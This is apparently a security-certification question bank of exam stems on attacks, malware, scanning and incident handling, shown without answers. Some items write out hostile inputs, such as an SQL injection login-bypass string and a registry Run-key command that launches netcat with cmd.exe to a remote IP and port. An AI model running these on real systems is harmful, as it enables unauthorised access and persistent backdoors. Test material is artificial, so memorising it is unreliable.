John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. On the We-are-secure login page, he enters ='or''=' as a username and successfully logs in to the user page of the Web site.

The we-are-secure login page is vulnerable to a __________.

Which of the following malicious software travels across computer networks without the assistance of a user?

Which of the following DoS attacks affects mostly Windows computers by sending corrupt UDP packets?

You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network. An attacker uses software that keeps trying password combinations until the correct password is found. Which type of attack is this?

You run the following command on the remote Windows server 2003 computer:

c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"

What task do you want to perform by running this command?

Each correct answer represents a complete solution. Choose all that apply.

Which of the following statements are true about a keylogger?

Each correct answer represents a complete solution. Choose all that apply.

John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He performs Web vulnerability scanning on the We-are-secure server. The output of the scanning test is as follows:

C:\whisker.pl -h target_IP_address

-- whisker / v1.4.0 / rain forest puppy / www.wiretrip.net -- = - = - = - = - =

= Host: target_IP_address

= Server: Apache/1.3.12 (Win32) ApacheJServ/1.1

mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22

+ 200 OK: HEAD /cgi-bin/printenv

John recognizes /cgi-bin/printenv vulnerability ('Printenv' vulnerability) in the We_are_secure server. Which of the following statements about 'Printenv' vulnerability are true?

Each correct answer represents a complete solution. Choose all that apply.

Fill in the blank with the appropriate name of the attack.

______ takes best advantage of an existing authenticated connection

Which of the following Denial-of-Service (DoS) attacks employ IP fragmentation mechanism?

Each correct answer represents a complete solution. Choose two.

Which of the following statements are true about tcp wrappers?

Each correct answer represents a complete solution. Choose all that apply.

In which of the following malicious hacking steps does email tracking come under?

Which of the following can be used to perform session hijacking?

Each correct answer represents a complete solution. Choose all that apply.

You work as an Incident handling manager for a company. The public relations process of the company includes an event that responds to the e-mails queries. But since few days, it is identified that this process is providing a way to spammers to perform different types of e-mail attacks. Which of the following phases of the Incident handling process will now be involved in resolving this process and find a solution?

Each correct answer represents a part of the solution. Choose all that apply.

You work as a Security Administrator for Net Perfect Inc. The company has a Windows-based network. You want to use a scanning technique which works as a reconnaissance attack. The technique should direct to a specific host or network to determine the services that the host offers.

Which of the following scanning techniques can you use to accomplish the task?

Victor works as a professional Ethical Hacker for SecureEnet Inc. He has been assigned a job to test an image, in which some secret information is hidden, using Steganography. Victor performs the following techniques to accomplish the task:

1. Smoothening and decreasing contrast by averaging the pixels of the area where significant color transitions occurs.

2. Reducing noise by adjusting color and averaging pixel value.

3. Sharpening, Rotating, Resampling, and Softening the image.

Which of the following Steganography attacks is Victor using?

You want to perform passive footprinting against we-are-secure Inc. Web server. Which of the following tools will you use?

Which of the following attacks are examples of Denial-of-service attacks (DoS)?

Each correct answer represents a complete solution. Choose all that apply.

In which of the following methods does an hacker use packet sniffing to read network traffic between two parties to steal the session cookies?

You work as a Network Administrator for Marioxnet Inc. You have the responsibility of handling two routers with BGP protocol for the enterprise's network. One of the two routers gets flooded with an unexpected number of data packets, while the other router starves with no packets reaching it. Which of the following attacks can be a potential cause of this?

Which of the following is the process of comparing cryptographic hash functions of system executables and configuration files?

Which of the following types of malware can an antivirus application disable and destroy?

Each correct answer represents a complete solution. Choose all that apply.

You discover that your network routers are being flooded with broadcast packets that have the return address of one of the servers on your network. This is resulting in an overwhelming amount of traffic going back to that server and flooding it. What is this called?

Which of the following systems is used in the United States to coordinate emergency preparedness and incident management among various federal, state, and local agencies?

Which of the following types of attacks is often performed by looking surreptitiously at the keyboard or monitor of an employee's computer?

You work as a Network Administrator in the SecureTech Inc. The SecureTech Inc. is using Linux-based server. Recently, you have updated the password policy of the company in which the server will disable passwords after four trials. What type of attack do you want to stop by enabling this policy?

Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?

Which of the following is a reason to implement security logging on a DNS server?

Which of the following is the best method of accurately identifying the services running on a victim host?

Buffer overflows are one of the major errors used for exploitation on the Internet today. A buffer overflow occurs when a particular operation/function writes more data into a variable than the variable was designed to hold.

Which of the following are the two popular types of buffer overflows?

Each correct answer represents a complete solution. Choose two.

John, a part-time hacker, has accessed in unauthorized way to the www.yourbank.com banking Website and stolen the bank account information of its users and their credit card numbers by using the SQL injection attack. Now, John wants to sell this information to malicious person Mark and make a deal to get a good amount of money. Since, he does not want to send the hacked information in the clear text format to Mark; he decides to send information in hidden text. For this, he takes a steganography tool and hides the information in ASCII text by appending whitespace to the end of lines and encrypts the hidden information by using the IDEA encryption algorithm. Which of the following tools is John using for steganography?

John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He finds that the We-are-secure server is vulnerable to attacks. As a countermeasure, he suggests that the Network Administrator should remove the IPP printing capability from the server. He is suggesting this as a countermeasure against __________.

Adam works as an Incident Handler for Umbrella Inc. His recent actions towards the incident are not up to the standard norms of the company. He always forgets some steps and procedures while handling responses as they are very hectic to perform.

Which of the following steps should Adam take to overcome this problem with the least administrative effort?

Which of the following tools can be used to perform brute force attack on a remote database?

Each correct answer represents a complete solution. Choose all that apply.

An attacker sends a large number of packets to a target computer that causes denial of service.

Which of the following type of attacks is this?

Victor is a novice Ethical Hacker. He is learning the hacking process, i.e., the steps taken by malicious hackers to perform hacking. Which of the following steps is NOT included in the hacking process?

Which of the following provides packet-level encryption between hosts in a LAN?

Which of the following protocols uses only User Datagram Protocol (UDP)?

John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He wants to perform a stealth scan to discover open ports and applications running on the We-are-secure server. For this purpose, he wants to initiate scanning with the IP address of any third party. Which of the following scanning techniques will John use to accomplish his task?

You want to connect to your friend's computer and run a Trojan on it. Which of the following tools will you use to accomplish the task?

Which of the following is used by attackers to obtain an authenticated connection on a network?

Which of the following is used to gather information about a remote network protected by a firewall?

John is a malicious attacker. He illegally accesses the server of We-are-secure Inc. He then places a backdoor in the We-are-secure server and alters its log files. Which of the following steps of malicious hacking includes altering the server log files?

Which of the following programs is used for bypassing normal authentication for securing remote access to a computer?

John works as a Network Security Professional. He is assigned a project to test the security of

www.we-are-secure.com. He establishes a connection to a target host running a Web service with netcat and sends a bad html request in order to retrieve information about the service on the host.

Which of the following attacks is John using?

Your IDS discovers that an intruder has gained access to your system. You immediately stop that access, change passwords for administrative accounts, and secure your network. You discover an odd account (not administrative) that has permission to remotely access the network. What is this most likely?

Session splicing is an IDS evasion technique in which an attacker delivers data in multiple small-sized packets to the target computer. Hence, it becomes very difficult for an IDS to detect the attack signatures of such attacks. Which of the following tools can be used to perform session splicing attacks?

Each correct answer represents a complete solution. Choose all that apply.

Which of the following is the method of hiding data within another media type such as graphic or document?

Which of the following are based on malicious code?

Each correct answer represents a complete solution. Choose two.

Which of the following Trojans is used by attackers to modify the Web browser settings?